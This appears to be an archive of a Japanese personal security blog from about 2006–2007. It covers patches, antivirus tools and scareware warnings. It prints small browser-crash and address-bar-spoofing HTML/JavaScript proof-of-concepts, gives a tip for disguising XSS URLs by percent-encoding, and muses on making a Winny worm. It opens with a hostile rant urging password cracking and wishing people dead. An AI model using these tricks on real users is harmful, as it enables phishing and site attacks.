円い月の丸い兎 - そして誰もまるくなった -

（　´▽｀）あー、日本も平和だねぇ。
どうやったらどこかの少年漫画で見たような恥ずかしいセリフが出てくるんだろ。
みんな昔はこうだったのかな？


**********************************************
○○○○は死ねぇぇぇぇ！！！
ctime: 07/11/19(Mon) 20:59
×××××様や○○○、そしてこの×××様を侮辱する奴は死ねぇぇぇぇ！！！！

よくもDikastiss様を攻撃する記事を書きやがったな！！！！
Dikastiss様よぉ、本気で奴のパス解読してやろーぜ！！！

このゲーザ様の怒りは収まれねぇ！！！！！
×× ×××＝○○○○も、××××も
アニヲタ鉄ヲタ腐女子もみな消えちまえ！！！

ヒャーッハッハッハッハ！！
**********************************************

○○○○ 07/11/19(Mon) 21:07

HDDを整理していたときに、無駄に容量の大きな正体不明のデータを発見。
ひさびさにHDDのウイルス、スパイウェアスキャンを実行。

ウイルスはAvast!、スパイウェアはSpybotでのスキャン。

ウイルスのスキャンでは、LoveLetterウイルスの誤検出を除いて検出されず。
スパイウェアのスキャンではTracking Cookieの類のみ検出。
特に危惧すべきマルウェアは検出されず。

今年に入って多分一回も全体のスキャンはやってませんでしたが、

結局あとで正体不明のファイルは不要なデータだと分かったので削除。


とりあえずここ数年は感染なしのようです。

偶然にもハッカー (クラッカー) に乗っ取られたサイトみつけた。

http://www.animeepisodes.net/

Google のキャッシュ
http://72.14.253.104/search?q=cache:G-PDNUpMR9kJ:www.animeepisodes.net/&hl=ja&ct=clnk&cd=1&gl=jp

WebArchive のキャッシュ (去年の 5 月ごろ)
http://web.archive.org/web/20060522175544/http://www.animeepisodes.net/

ずっとフリーの AVG を使ってきたけど
バージョンアップしたところ、ウイルスデータベースの更新がなぜかうまくいかなくなって、
英語を読むのも面倒だったので同じくフリーの Avast! に乗り換えた。

ところがそれからというもの Firefox が急に重くなったり
フリーズを起こすようになってしまった。

フリーズはまあたまに起こることはあったけど、
普段なら Ctrl+Alt+Del で終了できていたのに
今回はほとんどコントロールが効かなくなった。
しかも一日に二度まで・・・。

そういえば Zone Alarm とは相性が悪いと聞いたけど、
うちもこれ使ってるんですよねー。

どうしたものか・・・。

<画像略>パス教えて

パスワードを忘れたのは事實のやうだけど
果たして >>0 のまひは“どこの”まひなのであらうか。

もしかすると「サイト乘つ取りを狙ふ 38 歳○リコンネツトストーカー、私の自慢は執着力の強さです」だつたりするのでせうか。
あるいは、そもそもこの書き込みそのものが惡戲目的で、メールアドレスすら他人のものだつたりはしないだらうか？

ちなみにこのメールアドレスの持ち主らしき人物のホームページが web アーカイブに殘つてゐたりするのだけどね。
http://web.archive.org/web/20060409083006/http://ss.xrea.cc/

よくセキユリテイカテにパスワードを忘れたのでクラツクしてといふ要望を書く人々がをりますが、
パスワードなんて、特にネット上では普通そう簡單に見つけられるものではありません。
もしできたとしても違法だらうし、誰が本人かどうかも分からない相手にパスワードを教へるでせうか。
ていふかこの手の質問をしてくるほとんどは僞者だつたりするんですけどね。
パスワードを忘れたら管理者に問ひ合はせる。これが常識的な判斷で御座います。

幸ひなことに、メールアドレスが分かればパスワードは再發行できるやうです。
http://www.freepe.com/p-pass.htm

「パスワードを忘れたから拔いてくれ」とか
「自分のサーバーを誰もクラツクしてくれないからサーバークラツクツールを送つてくれ」とか・・・
セキユリテイカテは實に樂しいところで御座います。

本日マイクロソフト社の Office、IE、Windows などの製品のセキュリティホールに対するのパッチが多数公開されました。
自動更新に設定していない人はアップデートしましょう。

http://update.microsoft.com/

それと、もう知っているかも知れませんが、7 月 11 日を最後に Windows 98 / 98 SE / Me のサポートやセキュリティ更新プログラムの提供が打ち切られます。
したがって、もしそれ以降、重大なセキュリティホールが発見されたとしても、
新たにパッチを当てられることはなく、
Windows XP などにアップグレードする必要が出てきます。

それから Windows XP SP1 は今年の 10 月 10 日にサポートが終了される予定です。
私のも SP1 から SP2 に更新はしていなくて、
よりセキュリティが向上といいながらあれこれと欠陥が見つかっていたので
1 年ぐらいは更新を見送るつもりだったのですが
SP2 に更新すると IE の view-source: が使えなくなることも分かりました。
私は物凄く view-source: を利用しているのでこれが使えないのは大きな痛手なんですよね。
普通にブックマークレットと併用してサイトの解析に使ったりしていたので。

まあその代わりに IE 7 β のテストができないんですけどね。

QuickTime に 12 種類のセキュリティホールが見つかっています。
このため、細工された動画や画像などを QuickTime で開くと悪意あるプログラムが実行される危険性があります。

このセキュリティホールは QuickTime 7.1 で修正されているのでとっととアップグレードしましょう。

Windows 版
http://www.apple.com/jp/quicktime/download/win.html
Mac OS X 版
http://www.apple.com/jp/quicktime/download/mac.html

Windows 版だともれなく iTunes が付いてくるので不要な場合はこちら。
http://www.apple.com/jp/quicktime/download/standalone.html


IE では何も表示されなかったり文字化けして見えるかも。
このときは「表示」→「エンコード」→「Unicode (UTF-8)」としてください。

というか HTTP ヘッダで charset 指定しないから文字セットの間違いが起こるんですよ。
せめて META 要素を TITLE 要素の前に置いて欲しいものだわ。

あとメールアドレスは入力しないでもなぜかダウンロードできました。

<style></style>
<object>（　´▽｀）最近見つかった IE の脆弱性です。
<style></style>
<object>（　´▽｀）入れ子の OBJECT 要素に関する脆弱性で
<style></style>
<object>（　´▽｀）同時期に発見された火狐さんや safari の脆弱性とは違って
<style></style>
<object>（　´▽｀）任意のコードが実行される危険性があると報告されています。
<style></style>
<object>（　´▽｀）これに関して Microsoft はそのような危険性はないと発表したのですが、
<style></style>
<object>（　´▽｀）昨日になってこれと似た亜種のセキュリティ・ホールが発見され、
<style></style>
<object>（　´▽｀）さらに任意のコードが実行可能であることも確認されたようです。
<style></style>
<object>（　´▽｀）なお現在パッチはリリースされていません。
<style></style>
<object>（　´▽｀）対処法は IE を使わないことですかね。
<style></style>
<object>（　´▽｀）ちなみにエラーを発生させる実験は、
<style></style>
<object>（　´▽｀）ここまでの文章をメモ帳に 4 回貼り付けて HTML 形式で保存して IE で開くだけです。

火狐さんに脆弱性が見つかったようです。ただしこの脆弱性はブラウザをクラッシュさせるだけで深刻な問題ではないとのことです。
次のテキストをHTML形式で保存し火狐さんで開くとエラーが発生してブラウザがフリーズします（問題はバージョン1.5.0.2で確認されているようですが、他のバージョンでも起こる可能性があります。）。

<div id="hoge">hoge</div>
<script type="text/javascript">
<!--
var objDiv = document.getElementById("hoge");
var objIfrm = document.createElement("iframe");
var objIfrmDoc;

objDiv.appendChild(objIfrm);
objIfrmDoc = objIfrm.contentWindow.document;
objIfrmDoc.open();
objIfrmDoc.write("<iframe><\/iframe>");
objIfrmDoc.designMode = "on";
objIfrmDoc.close();
objIfrm.contentWindow.focus();
//-->
</script>

このJavaScriptのコードの意味などを少し説明すると、

http://itpro.nikkeibp.co.jp/article/NEWS/20060421/235941/

Winnyにバッファオーバーフローの脆弱性が見つかりました。
このため、悪意あるパケットを受信すると、Winnyの動作の停止や、
任意の命令が実行される危険性があります。

作者本人はこんな状況なんで対処は困難です。
http://jvn.jp/jp/JVN%2374294680/182914/index.html

割とウイルスとかも出回りやすいようだから、
誰かがその脆弱性を攻撃する為のパケットを送信するウイルスでも開発して放流すれば、
それに感染したパソコンが増加していくとWinnyのネットワークが崩壊する可能性もないともいえない。
初心者がネットワークを崩壊させるプログラムを広めていくというわけ。

脆弱性の詳細は公開されていないみたいだけど
実際に誰かが見つけてそれが流れ出すまでどれ位かかるもんだろうかね。

WinFixer、WinAntiVirus PRO、WinAntiSpywareが悪質ソフトであることは何度も書きました。
ブラックウォームというウイルスに感染しているという偽の警告を出す同種の悪質サイトに出会ったので記事にしておきます。
ブラックウォームに感染したという警告が突然出てきたとしても、
それは全くでたらめな警告です。

FlashGetという有名なダウンローダーソフトがあるのですが、
どうもFlashGetが無料利用の条件として表示させる広告にもWinAntiVirusなどのソフトが紹介されているようです。
広告の内容はパソコンでウイルスが検出されたという警告ダイアログのような画像。
まあつまりは、広告を載せることで、クリックした人が騙されてWinFixerなどの悪質ソフトを作っている会社に料金を支払い、
それが広告収入という報酬として広告掲載者に支払われるわけです。
FlashGetの広告はどれもいかがわしいとは思っていましたが
こういった詐欺に荷担するというのはどうかと思いますね。

その広告をクリックすると次のようなメッセージが警告ダイアログで表示されました。

>新しい脅威が検出されました：ウイルス名新しい脅威が検出されました：ウイルス名「BloodHound Virus」感染を防ぐため、セキュリティソリューションをダウンロードするのをお奨めします。感染を防ぐ為、セキュリティソリューションをダウンロードするのをお勧めします。

そして繋がったページはこれでした（FlashGetのIDらしきパラメータなどは削除しました）。
今のところ自動でインストールさせるような仕組みはありませんでした。

http://amaena.com/securityworm5/jp/

まだ対策はされていない問題です。

次のコードをHTML形式で保存して開いてみてください。
<script>
<!--
function winOpen(url) {
window.open(url, "hoge")
}

winOpen("http://www.google.co.jp/");
setTimeout("winOpen(\"http://kempele.fi/~skyostil/archive/dump/flash/flashback.swf\");", 200);
setTimeout("winOpen(\"http://thebbs.jp/\");", 3000);
//-->
</script>

すると、アドレスバーがhttp://www.google.co.jp/となっているにも関わらず、内容はザ掲示板です。
これは最近見つかった新しいバグのようで、
開いたウィンドウで全く別のFlashを開かせる際に競合が起こるようです。
フィッシング詐欺などに利用される危険性があります。

ちなみに読み込ませるFlashは適当にFLASHBACKにしてみました（笑）

こういう情報は定期的に見ておかないとダメだね、うん。
Internet Explorerに深刻な脆弱性が3/24に見つかっていたようです。

http://internet.watch.impress.co.jp/cda/special/2006/03/27/11381.html

これはIEのcreateTextRangeメソッドにヒープオーバーフローの問題があるというものです。
簡単な例として、次のコードをHTML形式で保存して開くと、
エラーが発生してInternet Explorerが終了されてしまいます。

<input type="radio" id="hoge">
<script>
<!--
var r = document.getElementById("hoge").createTextRange();
//-->
</script>

もちろんこれは、ただオーバーフローしたために終了されただけなので、
危険なコードではありません。

しかし、オーバーフローした領域に何らかの悪意あるコードが書き込まれた場合、
例えばPCを乗っ取るといったこともできてしまう危険性があります。

おお！"WinAntiVirus"（悪質ソフトの名前）をgoogleで日本語ページ検索したら4番目にうちの記事が出てきた（笑）

この記事→http://7899.hito.thebbs.jp/one/1141793533

でも表示されるタイトルは随筆名なんだよね・・・。
一つの記事を開いた場合、タイトルが記事のタイトルになるようにして貰えないかなぁ。
その内容を一番的確に表現するのがTITLE要素の役割だし（全然内容と関係ないタイトル付けたりしてるけど（笑））。

やっぱり検索で「悪質ソフト要注意！WinFixer 2005、WinAntiVirus、WinAntiSpyware…」というタイトルが出てきた方が、知らなかった人も「おや？」と思うだろうから。

被害者を減らすため皆さんもぜひ、WinFixer、WinAntiVirus、WinAntiSpywareなどは悪質ソフト！などという内容の記事を書いてがんがん宣伝してやりましょう（笑）

原発だとか空港だとか小学校だとかTBSだとかWinny使用によって内部情報が漏洩するという事件が後を絶たないね。
別にWinny自体にセキュリティ上の問題があるのではなく、拡張子が.exeのような実行ファイルを安易に開いてしまうという無知な人間が大勢いるという点が問題なんだろうね。
そもそもEXEファイルはファイル自体がアイコンのデータを持つことができるんで例えばアイコンだけ見れば画像ファイルと同じアイコンにすることも可能なんですよね。
その実行ファイル自体がネットワーク上にアップロードするという活動を行うのだとすると
ファイヤーウォールが警告を出すと思うので、共有フォルダに目的のファイルなどをコピーするというような活動なのかな？
だとするとそのウイルス自体はもの凄く簡単に作れそうだね。
ただしウイルス対策ソフトが対応できないような新種である必要があるけど。

というか実行ファイルを開いちゃってウイルスやスパイウェアに感染なんて、
別にWinnyに限ったことではなくて、「動画はこちら」と書いてあるのでクリックして、
ダイアログで"開く"をクリックしてしまったり、
あるいは実行ファイルだと知らずにダウンロードして開いてしまったりという危険性は
普通にインターネットをしている場合でも起こりうることだから（というかその被害も結構あるのでして）、
接続業者にインターネットを始める人にネット上の危険性をわかりやすく解説した冊子を付属させるよう呼びかけたり、
小学校からそういった基礎的な知識を付けさればいいと思うのだけどねぇ。
Winnyを使わないように呼びかける前に、もっとたくさんある問題から身を守るための知識を付けさせることこそ重要なんじゃないかと思うのですよ。

パソコンに感染したウイルスやスパイウェアの種類によっては、
駆除ソフトの起動を妨害するようなものがあります。
こういうときはセーフモードで起動して駆除を行うという方法の他に、
オンラインスキャンを利用するという手もあります。

駆除が可能なオンラインスキャンの例

TrendMicro　OnlineScan
http://housecall.trendmicro.com/

Panda Active Scan
http://www.pandasoftware.com/activescan/jp/activescan_principal.htm

前者は英語、後者は日本語ですが、後者を利用する場合メールアドレスが必要となります。

あとスパイウェアに関しては専用ソフトの方が性能がいいかと思われます。

類似悪質ソフトは他にもWinFirewallとかいろいろ。

WinFixerは悪質ソフト！にも書きましたが、
最近WinFixer 2005なるソフトの被害が増えているようです。
WinFixer 2005は、さもコンピュータに問題があるかのような警告を出してインストールを催促し、
さらにインストールするとコンピュータ上に重大な脅威があるとの嘘の警告により、
対処するために購入が必要であるかのように思わせ、支払いを求めるという悪質なものです。
基本的にこういうものはインストールせずに無視するだけでいいのですが、
勝手にインストールされたという事例があったようで、
Internet Explorerの脆弱性を利用してインストールさせる場合も考えられます。

また、場合によっては別にたちの悪いアドウェアを感染させるタイプも存在します。

対処法としてはアダルトサイト被害対策の部屋の次のページが参考になります。
http://www.higaitaisaku.com/removewinfixer.html

国内ではWinFixer 2005は割と被害が多いようですが、今後、類似の悪質ソフトであるWinAntiVirusやWinAntiSpywareなどの被害も増えるかも知れません。
被害がある前に悪質ソフトとして宣伝して有名にしてしまった方がいいでしょうね（笑）。

今名前を知っているところで、次のような名前のソフトがあります。

バイドクター日本語版は比較的最近無償配布が開始された、ウイルス・スパイウェアのスキャン/駆除ソフトです。
宣伝カテ外での宣伝スレ立てがあったと言うこともあり、まあ実際に使ってみることにしました。

ちなみに実際に使用した人の意見からはスキャンは非常に軽いが、誤検出が多いとのこと。

取り合えずインストール後（個人的にインストール先フォルダが指定できないのは頂けないなぁ）、起動してスパイウェアのスキャンを開始。
ちなみに画面は非常に初心者でも分かりやすい作りになっていました。
さて、スキャンしながら別のことをしていると、1分6秒という驚愕の速度でスキャンが終了。

そして検出されたもののリストがこれ↓

■WinAntiVirus-Pro-2006
・Software\Microsoft\Windows\CurrentVersion\Internet Setttings\ZoneMap\Domains\winfixer.com
winfixer.comというドメインに対するIEの設定（前にも書いたけど悪質ソフトを配布するサイトだね）。
レジストリの値は0x00000002（信頼済みサイト）ではなく0x00000004（制限付きサイト）であり、この内容に反応するのはおかしい。
■SearchSquire
・Software\Microsoft\Windows\CurrentVersion\Internet Setttings\ZoneMap\Domains\searchsquire.com
searchsquire.comというドメインに対するIEの設定。
レジストリの値は0x00000002（信頼済みサイト）ではなく0x00000004（制限付きサイト）であり、この内容に反応するのはおかしい。
■BonziBUDDY
・lhsp\help

Q：WinFixerは悪質ソフトって本当ですか？
A：（　´▽｀）はい、WinFixerは悪質ソフトです。

Web巡回中に図のような警告メッセージに出会いました。

>注意：レジストリデータベースまたはファイルシステムに有り得るエラーによりご利用のパソコンは機能が悪くなってブロックになってしまうことがあります。
>で無料の素速いスキャンを実施することができます。
>
>それでは、レジストリデータベースでのエラーを検出して修理するには WinFixer 2005をダウンロードしたいですか?。（推薦）

これは突然メッセージを表示させ、パソコンに何か問題があるかのように思わせてその修復のための有料ソフトを購入させようとする悪質な広告の一種です。
よく見るとおかしな日本語ですね。

もしOKをクリックすると、パソコンをスキャンするというページにジャンプします。
そこでスキャンのボタンをクリックすると、インストールのダイアログが表示され、インストールしてしまった場合
スキャンの結果重大な問題が発見されたかのような警告を出し、ソフトの購入を迫るという初心者騙しのソフトです。

これに限らず、ウイルスに感染しているだとかスパイウェアに感染しているだとかいった嘘の警告を出してソフトの購入を迫る広告などがあるので注意。

こういったインチキソフトの被害者を減らすためにも悪質ソフトだと宣伝しておいた方がいいでしょう。
どうも被害を被る人が増えているようなので。

詳しい説明などは下記サイト参照。
http://www.higaitaisaku.com/removewinfixer.html

ザの人の随筆にXSSの問題があるのは前に言ったけど、よく考えればタグの部分をescapeしてしまえば随筆やプロフィール内に問題のURLのリンクを張ることだってできるんだね。
普通"<script>"をエンコードすると"%3Cscript%3E"になってあからさまに怪しげなURLになってしまうけど、通常エンコードされない文字もエンコードして"%3C%73%63%72%69%70%74%3E"のようにすると見かけなんだかわから無くできてしまう。
ディレクトリの区切りの"/"や、パラメータの"?", "=", "&"は皆エンコード可能。
まあ問題のあるURLにジャンプするページに誘導するのと大差ないような気もしますが。